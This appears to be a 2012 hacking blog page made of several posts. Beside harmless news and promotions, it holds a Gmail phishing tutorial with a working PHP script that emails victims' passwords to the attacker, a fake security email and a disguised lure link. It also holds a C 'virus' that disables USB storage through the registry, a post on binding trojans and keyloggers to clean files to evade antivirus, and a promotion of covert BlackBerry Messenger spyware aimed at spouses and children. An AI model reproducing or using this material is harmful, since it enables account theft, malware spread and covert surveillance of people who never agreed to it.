How to get 1000 likes on your facebook status for free | 100% working

Monday 25 June 2012


watch my video tutorial on youtube :http://adf.ly/9jmCR
click here to goto the bot & skip ads : http://adf.ly/9jm4l

How to get 1000 likes on your facebook status for free



Use at your own risk :P:P!!!

How to Bind a virus(keylogger/trojan) with any other file | Binders Free download

                  


What is Binder?
Bridges the Gap between XML and Code (C++,C#,Java,VB6,VB.Net). Generates a class library based on an XML Schema (XSD, XDR or DTD). The resulting library makes it simple to read and write XML documents programmatically. Drastically cutting time spent developing and testing. Because the class library is strongly typed you can also make use of intelligence. The library forces compliance to the schema resulting in valid XML every time. Simple words it converts your code and forms into an executable program.
Why Hackers use Binder?
It’s simple. They bind the virus with another clean for example (.exe) to make the virus undetected to anti-virus software. Many binders has extra features like add bytes, change icons, etc. to make them more undetected. You can go to stuff page and download the binder to see how it’s work. Of course is detected from some anti-virus use it for education purpose.
How you can protect from a mask virus?
You can’t! Binders is usually detected very fast from good anti-virus software’s, when you open some binded virus your anti-virus software will probably show you (injection). If your anti-virus software is not detect the virus or the binder the only think you have to do is to confront it as a simple virus.


A good list of my binder collection Free download :
 3   nbinder
 4   sbinder

Operating System Developed by Anonymous | Anonymous-Os 0.1

A
nonymous-OS 0.1 : Anonymous Hackers released their own Operating System 
Anonymous-OS+0.1

Yes! Its true,  Anonymous Hackers released their own Operating System with name "Anonymous-OS", is Live is an ubuntu-based distribution and created under Ubuntu 11.10 and uses Mate desktop. You can create the LiveUSB with Unetbootin.

Pre-installed apps on Anonymous-OS:
- ParolaPass Password Generator
- Find Host IP
- Anonymous HOIC
- Ddosim
- Pyloris
- Slowloris
- TorsHammer
- Sqlmap
- Havij
- Sql Poison
- Admin Finder
- John the Ripper
- Hash Identifier
- Tor
- XChat IRC
- Pidgin
- Vidalia
- Polipo
- JonDo
- i2p
- Wireshark
- Zenmap
…and more

Download Anonymous-OS 0.1Warning : It is not developed by any Genuine Source, can be backdoored OS by any Law enforcement Company or Hacker. You at your own Risk.

Hacking With Android | (Anti) Android Network Tool Kit



Have an android phone, Looking for easy ways to hack like pentesters ?? Well you are in luck, Anti or Anti or Android networking Tool Kit  is Just what the world needs, another killer mobile app for android devices, Anti allows you to control other devices such as Desktop PC, other Android Phones and even iOS devices with just a few pushes






Anti - Android Network Tool Kit


Android Network Toolkit (ANTI) is an amazing android application. You could bring all the hacking tools on PC to your Android smartphone. Using this app is as simple as pushing a few buttons, and then you can penetrate your target.


How Anti Works ?
Anti will map your network, scan for active devices and vulnerabilities, and will  display the information accordingly, Green led signals an 'Active device', Yellow led signals "Available ports", and Red led signals "Vulnerability found". Also, each device will have an icon representing the type of the device. When finished scanning, Anti will produce an automatic report specifying which vulnerabilities you have or bad practices used, and how you can exploit/fix each one of them.




                                                        






Features


Scan - This will scan the selected target for open ports and vulnerabilities, also allowing the user to select a specific scanning script for a more advanced/targeted scan.


Spy - This will 'sniff' images transferred to/from the selected device and display them on your phone in a nice gallery layout. If you choose a network subnet/range as target, then all images transferred on that network - for all connected devices - will be shown. Another feature of the Spy plugin is to sniff URLs (web sites) and non-secured (ie, not HTTPS) username/passwords logins, shown on the bottom drawer.


D.O.S - This will cause a Denial Of Service (D.O.S) for the selected target, ie. it will deny them any further access to the internet until you exit the attack.


Replace images - This will replace all images transferred to/from the target with an Anti logo, thus preventing from attacked used seeing any images on their browsers while the browse the Internet, except for a nice looking Anti logo...


M.I.T.M - The Man In The Middle attack (M.I.T.M) is an advanced attack used mainly in combination with other attack. It allows invoking specific filters to manipulate the network data. Users can also add their own mitm filters to create more mitm attacks.


Attack - This will initiate a vulnerability attack using our Cloud service against a specific target. Once executed successfully, it will allow the attack to control the device remotely from your phone.


Report - This will generate a vulnerability report with findings, recommendations and tips on how to fix found vulnerabilities or bad practices used.




For more info and Download details please visit the Following link


                       Download (Anti)Android Network Tool Kit

How to chat on facebook with operamini | no application required



                                         



Hello facebook users :) 
Now you can chat on facebook using Opera mini 
No other applications needed
 
Just login to facebook and open this link 
 
click here  (skip ads)
 
Happy chatting :)  

Must Read For All Who Are In Desparate Need Of Web Traffic

Sunday 17 June 2012



Are you a website or blog owner working hard to generate traffic to your website or you are an internet marketer who is struggling to generate traffic to his/her web page so that his/her online venture should turn into money making game. Then here is a system that guarantees you hits and conversions from your online ventures. And the best part of its 100% free. I joined this system 7 days ago and I was able to pull out 922 page-views with with 441 unique page hits in just 7 days to my brand new website. Believe me that's not joke at all pulling out 922 hits in just 7 days. I personally recommend you to join this system and see results all by your own eyes I guarantee you it does works and the best part about it is its free. You don't need credit card or Paypal account to join this system registration is just clicks away.
Though paid membership is also available which guarantees double return than free membership but don't pay until you see results all by yourself while working free on it. When you will log-in to your account you will be asked to have a look on a 24 minute tutorial which will guide you though system. Please don't skip a part of it because each step means more traffic. For more information click following link.

SSL And TLS Attacks | Weak Ciphers

SSL And TLS Attacks | Weak Ciphers


Both SSL and TLS protocols works on the basis of Public Key Infrastructure (PKI) and commonly includes key exchange algorithm to handle security. Apart from just CA authority the strength of SSL cipher depends on length of key, encryption algorithm used to encipher data and Message Authentication Code (also known as SSL MAC). In this post we will have our look on how key length could effect on cipher strength. So depending on the length of initial key generated for data exchange during SSL and TLS communication, ciphers can be divided into following categories.

FBI will Monitor Social Media using Crawl Application

Monday 11 June 2012

The Federal Bureau of Investigation is looking for a better way to spy on Facebook and Twitter users. The Bureau is asking companies to build software that can effectively scan social media online for significant words, phrases and behavior so that agents can respond.A paper posted on the FBI website asks for companies to build programs that will map sentiment and wrongdoing.



The application must be infinitely flexible and have the ability to adapt quickly to changing threats to maintain the strategic and tactical advantage,” the Request for Information said,The purpose of this effort is to meet the outlined objectives…for the enhancement [of] FBI SOIC’s overall situation awareness and improved strategic decision making.”The tool would be used in “reconnaisance and surveillance missions, National Special Security Events (NSS) planning, NSSE operations, SOIC operations, counter intelligence, terrorism, and more.
Although the police, including in Britain, already use Facebook routinely to ascertain the whereabouts of criminals, automatically filtering out irrelevant information remains challenging. The new FBI application will be able to automatically highlight the most relevant information. The FBI is seeking responses by 10 February.

Email account hacking with PHISHING | Gmail, Yahoo, msn hacking



This is my favourite trick for hacking email accounts. I used it on many people and most of people are hacked. Success of this trick depends on the art of sending fake links to other people.
 Main theme of this trick is create fake pages which look like original website but work according to your programming. When user login in this fake page assuming it as a real website. The user id and password would be in your email inbox. For uploading your pages to web you should have an hosting account with some web host without any banner or ad. use this linkfree web hostsCreate an account in any of web host and upload your pages to its root directory. But make sure your hosts support mail sending from scripts.
Suppose you are going to make Gmail phishing page. Open Gmail login page and save this page to your computer. Now open its html coding and find out form tag inside the html coding. Change action page to your script page which will send you email of hacked user id and password. Page will look like original Gmail page but it will send data to you. Now create the script page using any of language such as php, asp or any other.
php script
<php


//CHange it to Your email address
$email = “XYZ@gmail.com”;
// The subject


$subject = “Hack”;


// The message
$message = “Email:”.$_POST['Email'].”Password:”.$_POST['Passwd'];
$mail_sent = mail($email, $subject, $message, “From: $email”);


?>
now upload your fake website to your domain for ex. yourdomain.com. use free domain given by the host. Now send this page to the person whose id you wanna hack. This is the main part of the phishing. You can send him a mail like this:
dear Gmail user, This mail is sent to you by the spam security department of Gmail service. We are sorry to say that your account has been reported abuse by many users so we have to check you account. If you will not respond soon you account will be deleted by mail server. If you are not a spam or bot, verify yourself as a human by given page.
You need to verify yourself by an captcha security check by this URL:
http://www.yourdomain.com?var=https://www.g00gle.c0m/acc0untsinfo/SarviceL0gins&services=email&possive=true&rm=false&continue=http%3A%2F%2Fmail.g00gle.c0%2Femail%2F%3Fui%3Dhtm%26zy%3Dl&bsv=1eic6yukvdlkbd9oa4y3&scc=1
do not reply : this email is sent by an automated system so please do not reply to this email because no body here to respond your email. thanks for your support
note: replace yourdomain.com in the link with your actual link. Link is only yourdomain.com. Rest data is only to confuse user. ;)
When user will click on the link and login with the your fake page he will be hacked
happy hacking :)

USB-Pendrive Virus



Virus is a program which infects computer, in different way. I am explaining about a Virus Which can easily be made in C or C++, ,When we have run .exe file of this Pendrive-usb virus then when we connect pendrive with our computer usb,it will not be connected. Operating System would not be able to detect pendrive.
Code is written to directly change the usb registry option and change its key. 








1.Creating usb-pendrive Virus :-


  • Install Turbo C or C++
  • Open TC.exe and there write the coding


#include<stdio.h>
void main()
{


system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet
\\Services\\USBSTOR \/v Start \/t REG_DWORD \/d 4 \/f");




  • Above Line system(".....................");it is in one Line


  • Save The Above Program as usbblock.c or any other name.
  • Compile and Run the above Program
  • Congratulation! you are succesfull to create the usb-pendrive Virus
  • Now go to drive where C is installed (Open TC folder) and then BIN ,have that usb-pendrive virus usbblock.exe to be used..........
  • Run that usbblock.exe in your computer to test.
  • Attach Pendrive to your computer usb ....OH! Shit Pendrive doesn't get detected...virus
  • Dont infect any other computer as it is only for educational purpose.




2.To reverse the effect of USB-Pendrive Virus (Removal of that Virus) :-
Install Turbo C or C++
Open TC.exe and there write the coding




#include<stdio.h>


void main()
{


system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\
Services\\USBSTOR \/v Start \/t REG_DWORD \/d 3 \/f");




  • Above Line system(".....................");it is in one Line


  • Save The Above Program as unblockusb.c or any other name.
  • Compile and Run the above Program
  • Congratulation! you are succesfull to create .exe file to unblock USB
  • Now go to drive where C is installed (Open TC folder) and then BIN ,have that unblockusb.exe to be used..........
Run that unblockusb.exe to reverse the effect of usbblock.exe.

BBM Chats Spy Software: Put your suspicions to rest!



The most sought after blackberry spy feature is the BBM chat spy software. It is ideal for spouses and parents whose spouses/children are addicted to this highly addictive communication method. Those of us who have family or friends, who use the blackberry messenger, know that it is downright impossible to carry any conversation with these people whose fingers seem to be glued to their blackberry keypads. And it can’t help and drive the other person crazy about the content of such 24/7 conversations. A concerned parent can’t help but wonder who his daughter keeps chatting with. The same way a husband can’t remove the doubts he might have his wife forever BBMing with someone. An employer, whose company is suffering because of information leaks, needs to screen every channel of communication in and out of his company; and this includes the BBM chats. In such scenarios the blackberry messenger spy software can be a blessing.


How does the BBM chat spy software work?
 For the Blackberry MessengarSpy to work, it just needs to be installed on the target phone. This process is easy, step by step guided and takes only a couple of minutes. An online account is then set up for the user. The software latches on to the closest wifi and transfers the information online. And then the whole content of the chat is available on the spy account.  The user of the phone has no idea about this as the BBM spy is completely discrete and undetectable

What becomes accessible?
 The messages sent, and the messages received are all made available to the user. This way the user is able to read the entire two-way conversation. Even if the messages erased as soon as they are read by the phone user, they still become logged and available on the online Blackberry spy account. Not only that any files that are sent through the Blackberry messenger also becomes available. Even if the person is talking with multiple people at the same time, every single conversation is available on the online spy account. The two sided conversation with each message, its sender, its exact time and date becomes logged. The user can access all this information from his spy account from any internet connection in the world.

The BBM spy software will help you find out the truth and put your suspicions to rest!


Author Bio
 Alysa Jeff is technology lover girl, she writes for  BlackberrySpy to disseminate information to people regarding all the Innovation in the field of technology. She likes to communicate to people regarding all the latest update in gadget and App world and tell them about the features and advantages of App.

Facebook down in India

Today moring I tried to log in to my facebook account but every time it failed.iI thought it is due to my slow internet connection.I then i tried to log in by changing www.facbook.com to m.facebook.com which is the mobile version of it and it worked.so what really happened??

So this is what happened.


Facebook users in India faced trouble logging onto the site on Tuesday, as the site kept crashing in the morning. For now full access has been restored. According to Tech2.comsome users had access while others faced trouble signing in.

Access via desktops was the most affected, with users finding that they were unable to post or share links on the site which kept crashing. For some lucky users, mobile apps and the mobile site, m.facebook.com, was accessible. As expected, Facebook’s distraught users, turned to twitter to vent their rage on not having access to Facebook. DNS (Domain Name System) and #Facebook are still trending on Twitter India.

DNS translates queries for domain names (which are meaningful to humans) into IP addresses for the purpose of locating computer services and devices worldwide. The social networking site faced a DNS issue last week as well when European users faced an outage.
Oh no where'd Facebook go? AFP
Twitter was soon abuzz with users offering help to each on how to correct the DNS issue. According to @Prasad Parmaj, users could have used the following tip
Change IP addresses 8.8.8.8 and 8.8.4.4 as your #DNS servers to solve Facebook india access problem.
You can change DNS settings by going to network settings inside your browser.
Of course Twitter also has people commenting that since Facebook was gone, people might finally get down to work.
For now the site is back and India is back to normal again. The company has not issued an official statement on why services were down in India.